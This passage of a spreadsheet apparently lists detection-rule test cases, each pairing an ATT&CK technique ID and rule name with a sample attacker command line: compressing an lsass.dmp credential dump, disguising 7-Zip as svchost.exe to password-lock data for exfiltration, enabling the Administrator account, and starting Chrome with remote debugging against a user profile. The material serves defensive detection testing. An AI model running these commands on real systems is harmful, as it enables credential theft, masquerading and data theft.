          <t>proc_creation_win_7zip_exfil_dmp_files</t>
        </is>
      </c>
      <c r="C143" s="43" t="inlineStr">
        <is>
          <t>7Zip Compressing Dump Files</t>
        </is>
      </c>
      <c r="D143" s="43" t="inlineStr">
        <is>
          <t>ec570e53-4c76-45a9-804d-dc3f355ff7a7</t>
        </is>
      </c>
      <c r="E143" s="43" t="inlineStr">
        <is>
          <t>7z a archive.zip lsass.dmp</t>
        </is>
      </c>
      <c r="F143" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G143" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H143" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I143" s="43" t="n"/>
      <c r="J143" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K143" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="144" ht="15.75" customHeight="1" s="42">
      <c r="A144" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B144" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_7zip_exfil_dmp_files</t>
        </is>
      </c>
      <c r="C144" s="43" t="inlineStr">
        <is>
          <t>7Zip Compressing Dump Files</t>
        </is>
      </c>
      <c r="D144" s="43" t="inlineStr">
        <is>
          <t>ec570e53-4c76-45a9-804d-dc3f355ff7a7</t>
        </is>
      </c>
      <c r="E144" s="43" t="inlineStr">
        <is>
          <t>7z a archive.zip lsass.dmp"</t>
        </is>
      </c>
      <c r="F144" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G144" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H144" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I144" s="43" t="n"/>
      <c r="J144" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K144" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="145" ht="15.75" customHeight="1" s="42">
      <c r="A145" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B145" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_7zip_exfil_dmp_files</t>
        </is>
      </c>
      <c r="C145" s="43" t="inlineStr">
        <is>
          <t>7Zip Compressing Dump Files</t>
        </is>
      </c>
      <c r="D145" s="43" t="inlineStr">
        <is>
          <t>ec570e53-4c76-45a9-804d-dc3f355ff7a7</t>
        </is>
      </c>
      <c r="E145" s="43" t="inlineStr">
        <is>
          <t>7z a archive.zip lsass.dmp`</t>
        </is>
      </c>
      <c r="F145" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G145" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H145" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I145" s="43" t="n"/>
      <c r="J145" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K145" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="146" ht="15.75" customHeight="1" s="42">
      <c r="A146" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B146" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_7zip_exfil_dmp_files</t>
        </is>
      </c>
      <c r="C146" s="43" t="inlineStr">
        <is>
          <t>7Zip Compressing Dump Files</t>
        </is>
      </c>
      <c r="D146" s="43" t="inlineStr">
        <is>
          <t>ec570e53-4c76-45a9-804d-dc3f355ff7a7</t>
        </is>
      </c>
      <c r="E146" s="43" t="inlineStr">
        <is>
          <t>7z a archive.zip lsass.dmp#</t>
        </is>
      </c>
      <c r="F146" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G146" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H146" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I146" s="43" t="n"/>
      <c r="J146" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K146" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="147" ht="15.75" customHeight="1" s="42">
      <c r="A147" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B147" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_7zip_exfil_dmp_files</t>
        </is>
      </c>
      <c r="C147" s="43" t="inlineStr">
        <is>
          <t>7Zip Compressing Dump Files</t>
        </is>
      </c>
      <c r="D147" s="43" t="inlineStr">
        <is>
          <t>ec570e53-4c76-45a9-804d-dc3f355ff7a7</t>
        </is>
      </c>
      <c r="E147" s="43" t="inlineStr">
        <is>
          <t>7z a archive.zip lsass.dmp;</t>
        </is>
      </c>
      <c r="F147" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G147" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H147" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I147" s="43" t="n"/>
      <c r="J147" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K147" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="148" ht="15.75" customHeight="1" s="42">
      <c r="A148" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B148" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_7zip_exfil_dmp_files</t>
        </is>
      </c>
      <c r="C148" s="43" t="inlineStr">
        <is>
          <t>7Zip Compressing Dump Files</t>
        </is>
      </c>
      <c r="D148" s="43" t="inlineStr">
        <is>
          <t>ec570e53-4c76-45a9-804d-dc3f355ff7a7</t>
        </is>
      </c>
      <c r="E148" s="43" t="inlineStr">
        <is>
          <t>7z a archive.zip lsass.dmp:</t>
        </is>
      </c>
      <c r="F148" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G148" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H148" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I148" s="43" t="n"/>
      <c r="J148" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K148" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="149" ht="15.75" customHeight="1" s="42">
      <c r="A149" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B149" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_7zip_password_compression</t>
        </is>
      </c>
      <c r="C149" s="43" t="inlineStr">
        <is>
          <t>Compress Data and Lock With Password for Exfiltration With 7-ZIP</t>
        </is>
      </c>
      <c r="D149" s="43" t="inlineStr">
        <is>
          <t>9fbf5927-5261-4284-a71d-f681029ea574</t>
        </is>
      </c>
      <c r="E149" s="43" t="inlineStr">
        <is>
          <t>copy 7z.exe svchost.exe &amp;&amp; svchost.exe a -p password123 archive.7z C:\data\*</t>
        </is>
      </c>
      <c r="F149" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G149" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H149" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I149" s="43" t="n"/>
      <c r="J149" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K149" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="150" ht="15.75" customHeight="1" s="42">
      <c r="A150" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B150" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_7zip_password_compression</t>
        </is>
      </c>
      <c r="C150" s="43" t="inlineStr">
        <is>
          <t>Compress Data and Lock With Password for Exfiltration With 7-ZIP</t>
        </is>
      </c>
      <c r="D150" s="43" t="inlineStr">
        <is>
          <t>9fbf5927-5261-4284-a71d-f681029ea574</t>
        </is>
      </c>
      <c r="E150" s="43" t="inlineStr">
        <is>
          <t>copy 7z.exe svchost.exe &amp;&amp; svchost.exe a -p"password123" archive.7z C:\data\*</t>
        </is>
      </c>
      <c r="F150" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G150" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H150" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I150" s="43" t="n"/>
      <c r="J150" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K150" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="151" ht="15.75" customHeight="1" s="42">
      <c r="A151" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B151" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_user_default_accounts_manipulation</t>
        </is>
      </c>
      <c r="C151" s="43" t="inlineStr">
        <is>
          <t>Suspicious Manipulation Of Default Accounts Via Net.EXE</t>
        </is>
      </c>
      <c r="D151" s="43" t="inlineStr">
        <is>
          <t>5b768e71-86f2-4879-b448-81061cbae951</t>
        </is>
      </c>
      <c r="E151" s="43" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\net1.exe user Administrator /active:yes</t>
        </is>
      </c>
      <c r="F151" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G151" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H151" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I151" s="43" t="n"/>
      <c r="J151" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K151" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="152" ht="15.75" customHeight="1" s="42">
      <c r="A152" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B152" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_user_default_accounts_manipulation</t>
        </is>
      </c>
      <c r="C152" s="43" t="inlineStr">
        <is>
          <t>Suspicious Manipulation Of Default Accounts Via Net.EXE</t>
        </is>
      </c>
      <c r="D152" s="43" t="inlineStr">
        <is>
          <t>5b768e71-86f2-4879-b448-81061cbae951</t>
        </is>
      </c>
      <c r="E152" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\net.exe user Guest /active:no</t>
        </is>
      </c>
      <c r="F152" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G152" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H152" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I152" s="43" t="n"/>
      <c r="J152" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K152" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="153" ht="15.75" customHeight="1" s="42">
      <c r="A153" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B153" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rar_compress_data</t>
        </is>
      </c>
      <c r="C153" s="43" t="inlineStr">
        <is>
          <t>Files Added To An Archive Using Rar.EXE</t>
        </is>
      </c>
      <c r="D153" s="43" t="inlineStr">
        <is>
          <t>6f3e2987-db24-4c78-a860-b4f4095a7095</t>
        </is>
      </c>
      <c r="E153" s="43" t="inlineStr">
        <is>
          <t>copy "rar.exe" archiver.exe &amp;&amp; archiver.exe a C:\Temp\archive.rar C:\SensitiveData\*</t>
        </is>
      </c>
      <c r="F153" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G153" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H153" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I153" s="43" t="n"/>
      <c r="J153" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K153" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="154" ht="15.75" customHeight="1" s="42">
      <c r="A154" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B154" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rar_compression_with_password</t>
        </is>
      </c>
      <c r="C154" s="43" t="inlineStr">
        <is>
          <t>Rar Usage with Password and Compression Level</t>
        </is>
      </c>
      <c r="D154" s="43" t="inlineStr">
        <is>
          <t>faa48cae-6b25-4f00-a094-08947fef582f</t>
        </is>
      </c>
      <c r="E154" s="43" t="inlineStr">
        <is>
          <t>rar.exe a -hpSecret -m5 archive.rar C:\temp\sensitive_data.txt</t>
        </is>
      </c>
      <c r="F154" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G154" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H154" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I154" s="43" t="n"/>
      <c r="J154" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K154" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="155" ht="15.75" customHeight="1" s="42">
      <c r="A155" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B155" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_debugging</t>
        </is>
      </c>
      <c r="C155" s="43" t="inlineStr">
        <is>
          <t>Potential Data Stealing Via Chromium Headless Debugging</t>
        </is>
      </c>
      <c r="D155" s="43" t="inlineStr">
        <is>
          <t>3e8207c5-fcd2-4ea6-9418-15d45b4890e4</t>
        </is>
      </c>
      <c r="E155" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User\Data --headless</t>
        </is>
      </c>
      <c r="F155" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G155" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H155" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I155" s="43" t="n"/>
      <c r="J155" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K155" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="156" ht="15.75" customHeight="1" s="42">
      <c r="A156" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B156" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_debugging</t>
        </is>
      </c>
      <c r="C156" s="43" t="inlineStr">
        <is>
          <t>Potential Data Stealing Via Chromium Headless Debugging</t>
        </is>
      </c>
      <c r="D156" s="43" t="inlineStr">
        <is>
          <t>3e8207c5-fcd2-4ea6-9418-15d45b4890e4</t>
        </is>
      </c>
      <c r="E156" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User\Data --headless=new</t>
        </is>
      </c>
      <c r="F156" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G156" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H156" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I156" s="43" t="n"/>
      <c r="J156" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K156" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="157" ht="15.75" customHeight="1" s="42">
      <c r="A157" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B157" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_debugging</t>
        </is>
      </c>
      <c r="C157" s="43" t="inlineStr">
        <is>
          <t>Potential Data Stealing Via Chromium Headless Debugging</t>
        </is>
      </c>
      <c r="D157" s="43" t="inlineStr">
        <is>
          <t>3e8207c5-fcd2-4ea6-9418-15d45b4890e4</t>
        </is>
      </c>
      <c r="E157" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User\Data --headless --disable-automation</t>
        </is>
      </c>
      <c r="F157" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G157" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H157" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I157" s="43" t="n"/>
      <c r="J157" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K157" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="158" ht="15.75" customHeight="1" s="42">
      <c r="A158" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B158" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C158" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D158" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E158" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222</t>
        </is>
      </c>
      <c r="F158" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G158" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H158" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I158" s="43" t="n"/>
      <c r="J158" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K158" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="159" ht="15.75" customHeight="1" s="42">
      <c r="A159" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B159" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C159" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D159" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E159" s="43" t="inlineStr">
        <is>
          <t>chrome.exe -remote-debugging-port=9222</t>
        </is>
      </c>
      <c r="F159" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G159" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H159" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I159" s="43" t="n"/>
      <c r="J159" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K159" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="160" ht="15.75" customHeight="1" s="42">
      <c r="A160" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B160" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C160" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D160" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E160" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --profile-directory=Default</t>
        </is>
      </c>
      <c r="F160" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G160" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H160" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I160" s="43" t="n"/>
      <c r="J160" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K160" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="161" ht="15.75" customHeight="1" s="42">
      <c r="A161" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B161" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C161" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D161" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E161" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-address=127.0.0.1 --remote-debugging-port=9222</t>
        </is>
      </c>
      <c r="F161" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G161" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H161" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I161" s="43" t="n"/>
      <c r="J161" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K161" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="162" ht="15.75" customHeight="1" s="42">
      <c r="A162" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B162" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C162" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D162" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E162" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-socket-name=debug_socket</t>
        </is>
      </c>
      <c r="F162" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G162" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H162" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I162" s="43" t="n"/>
      <c r="J162" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K162" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="163" ht="15.75" customHeight="1" s="42">
      <c r="A163" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B163" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C163" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D163" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E163" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-pipe=debug_pipe</t>
        </is>
      </c>
      <c r="F163" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G163" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H163" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I163" s="43" t="n"/>
      <c r="J163" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K163" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="164" ht="15.75" customHeight="1" s="42">
      <c r="A164" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B164" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C164" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D164" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E164" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --no-sandbox</t>
        </is>
      </c>
      <c r="F164" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G164" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H164" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I164" s="43" t="n"/>
      <c r="J164" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K164" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="165" ht="15.75" customHeight="1" s="42">
      <c r="A165" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B165" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C165" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D165" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E165" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --disable-gpu</t>
        </is>
      </c>
      <c r="F165" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G165" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H165" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I165" s="43" t="n"/>
      <c r="J165" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K165" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="166" ht="15.75" customHeight="1" s="42">
      <c r="A166" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B166" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C166" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D166" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E166" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --headless=new</t>
        </is>
      </c>
      <c r="F166" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G166" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H166" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I166" s="43" t="n"/>
      <c r="J166" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K166" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="167" ht="15.75" customHeight="1" s="42">
      <c r="A167" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B167" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C167" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D167" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E167" s="43" t="inlineStr">
        <is>
          <t>firefox.exe -start-debugger-server 9222</t>
        </is>
      </c>
      <c r="F167" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G167" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H167" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I167" s="43" t="n"/>
      <c r="J167" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K167" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="168" ht="15.75" customHeight="1" s="42">
      <c r="A168" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B168" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C168" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D168" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E168" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn</t>
        </is>
      </c>
      <c r="F168" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G168" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H168" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I168" s="43" t="n"/>
      <c r="J168" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K168" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="169" ht="15.75" customHeight="1" s="42">
      <c r="A169" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B169" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C169" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D169" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E169" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn</t>
        </is>
      </c>
      <c r="F169" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G169" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H169" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I169" s="43" t="n"/>
      <c r="J169" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K169" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="170" ht="15.75" customHeight="1" s="42">
      <c r="A170" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B170" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C170" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D170" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E170" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -Command Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn</t>
        </is>
      </c>
      <c r="F170" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G170" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H170" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I170" s="43" t="n"/>
      <c r="J170" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K170" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="171" ht="15.75" customHeight="1" s="42">
      <c r="A171" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B171" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C171" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D171" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E171" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Add-PSSnapin Microsoft.Exchange.Powershell.Snapin"</t>
        </is>
      </c>
      <c r="F171" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G171" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H171" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I171" s="43" t="n"/>
